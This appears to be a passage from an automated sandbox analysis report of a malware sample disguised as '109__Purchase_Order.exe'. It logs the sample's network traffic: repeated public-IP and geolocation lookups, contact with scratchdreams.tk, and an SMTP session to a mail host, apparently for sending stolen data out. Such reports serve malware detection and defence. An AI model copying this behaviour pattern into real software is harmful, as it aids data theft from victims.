Apr 4, 2024 01:21:03.974780083 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:03.974906921 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:03.974956036 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:03.975428104 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:03.978549004 CEST	49744	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:03.979880095 CEST	49746	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:04.215152025 CEST	80	49744	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:04.215338945 CEST	49744	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:04.221057892 CEST	80	49746	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:04.221136093 CEST	49746	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:04.221275091 CEST	49746	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:04.462522030 CEST	80	49746	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:04.463762999 CEST	80	49746	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:04.465015888 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:04.465040922 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:04.465121031 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:04.465393066 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:04.465403080 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:04.512649059 CEST	49746	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:04.725568056 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:04.727046967 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:04.727063894 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:05.028724909 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:05.028950930 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:05.028995991 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.032601118 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.037205935 CEST	49746	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:05.038397074 CEST	49748	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:05.278434038 CEST	80	49746	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:05.278507948 CEST	49746	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:05.279963970 CEST	80	49748	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:05.280040979 CEST	49748	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:05.280213118 CEST	49748	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:05.521764994 CEST	80	49748	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:05.522617102 CEST	80	49748	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:05.523699999 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.523736954 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:05.523797035 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.524034977 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.524049044 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:05.575129032 CEST	49748	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:05.779833078 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:05.825138092 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.884190083 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:05.884198904 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:06.087543964 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:06.087697983 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:06.087764978 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:06.103822947 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:06.115992069 CEST	49748	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:06.357681036 CEST	80	49748	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:06.357759953 CEST	49748	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:07.737317085 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:07.737337112 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:07.737411976 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:07.737842083 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:07.737855911 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:08.006627083 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:08.006818056 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:08.008372068 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:08.008378983 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:08.008675098 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:08.009941101 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:08.056235075 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:39.222846031 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:39.222903013 CEST	443	49750	104.21.27.85	192.168.2.4
Apr 4, 2024 01:21:39.222992897 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:39.236762047 CEST	49750	443	192.168.2.4	104.21.27.85
Apr 4, 2024 01:21:44.603158951 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:44.799479961 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:44.799578905 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:45.017853975 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:45.018009901 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:45.213675022 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:45.213936090 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:45.214875937 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:45.414038897 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:45.416604042 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:45.617820978 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:45.618011951 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:45.816104889 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:45.816266060 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:46.029256105 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:46.031955004 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:21:46.229124069 CEST	587	49757	208.91.199.225	192.168.2.4
Apr 4, 2024 01:21:46.229202986 CEST	49757	587	192.168.2.4	208.91.199.225
Apr 4, 2024 01:22:05.249310970 CEST	80	49738	193.122.6.168	192.168.2.4
Apr 4, 2024 01:22:05.249381065 CEST	49738	80	192.168.2.4	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 01:20:57.331588030 CEST	63175	53	192.168.2.4	1.1.1.1
Apr 4, 2024 01:20:57.456849098 CEST	53	63175	1.1.1.1	192.168.2.4
Apr 4, 2024 01:20:58.251255989 CEST	61279	53	192.168.2.4	1.1.1.1
Apr 4, 2024 01:20:58.379722118 CEST	53	61279	1.1.1.1	192.168.2.4
Apr 4, 2024 01:21:06.115909100 CEST	61869	53	192.168.2.4	1.1.1.1
Apr 4, 2024 01:21:06.507666111 CEST	53	61869	1.1.1.1	192.168.2.4
Apr 4, 2024 01:21:44.476408005 CEST	59186	53	192.168.2.4	1.1.1.1
Apr 4, 2024 01:21:44.602540970 CEST	53	59186	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2024 01:20:57.331588030 CEST	192.168.2.4	1.1.1.1	0x7285	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:58.251255989 CEST	192.168.2.4	1.1.1.1	0xa473	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:06.115909100 CEST	192.168.2.4	1.1.1.1	0x4e71	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:44.476408005 CEST	192.168.2.4	1.1.1.1	0x4b0c	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 4, 2024 01:20:57.456849098 CEST	1.1.1.1	192.168.2.4	0x7285	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2024 01:20:57.456849098 CEST	1.1.1.1	192.168.2.4	0x7285	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:57.456849098 CEST	1.1.1.1	192.168.2.4	0x7285	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:57.456849098 CEST	1.1.1.1	192.168.2.4	0x7285	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:57.456849098 CEST	1.1.1.1	192.168.2.4	0x7285	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:57.456849098 CEST	1.1.1.1	192.168.2.4	0x7285	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:58.379722118 CEST	1.1.1.1	192.168.2.4	0xa473	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:20:58.379722118 CEST	1.1.1.1	192.168.2.4	0xa473	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:06.507666111 CEST	1.1.1.1	192.168.2.4	0x4e71	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:06.507666111 CEST	1.1.1.1	192.168.2.4	0x4e71	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:44.602540970 CEST	1.1.1.1	192.168.2.4	0x4b0c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:44.602540970 CEST	1.1.1.1	192.168.2.4	0x4b0c	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:44.602540970 CEST	1.1.1.1	192.168.2.4	0x4b0c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Apr 4, 2024 01:21:44.602540970 CEST	1.1.1.1	192.168.2.4	0x4b0c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:20:57.704248905 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 01:20:57.947427988 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:20:57 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 65e16ba6375192e2c0d3349e36e2f71e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 4, 2024 01:20:57.955967903 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 01:20:58.198860884 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:20:58 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 75cc5f0ebbab0e1f2ee66ded15988cbf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 4, 2024 01:20:58.953051090 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 01:20:59.195441008 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:20:59 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 422b0df697b34f772593e3a4414322ea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:21:00.010502100 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 01:21:00.249517918 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:00 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: aaf298b2473ec11d89032b0b5f659b1a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:21:01.075114012 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 01:21:01.312144995 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:01 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3e029d2a49d6f9a6f44b44fbdf939c21 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:21:02.123254061 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 01:21:02.367398977 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:02 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b5690ecb054e53f00e2687f38361a56b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:21:03.172621012 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 01:21:03.409989119 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:03 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1b249d0875c14c33dd6b98ff369912d2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:21:04.221275091 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 01:21:04.463762999 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:04 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cb8dd653d495f92766bc52834d5950aa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	193.122.6.168	80	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 01:21:05.280213118 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 01:21:05.522617102 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:05 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c3f0fbe26dd5d51d4cb3e21ad004be40 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:20:58 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-03 23:20:58 UTC	716	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:20:58 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37039 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1v6AGj28S%2FI0WtOGZEaRCPxuO4bv73cmWstzw%2BDuTp76DrjD1KZyHIvHyN%2Ff77AHxWwa4XhsVmI%2FBbhY%2F%2FeMPrCzbmQ0zUuG3YrD3UTUlpcNXguEH7%2F98Guxfh%2BJOBE6uUjhnSR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccad7e8786dc5-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:20:58 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:20:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:20:59 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-03 23:20:59 UTC	712	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:20:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37040 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8QHZewdIgJHXgmjYMR8n03yKBtJg69I6xrrPWAwg%2FFxdjfkqHn7Emfu%2FBmdxxZHKDjWoIafaznfCCKUQilhqL%2Bt%2B4AvQSfrKQTJQlhG4O1JnJYdxb0XTaqg88pASt%2Bgo%2BLorSIE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccadcf84e4c0d-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:20:59 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:20:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

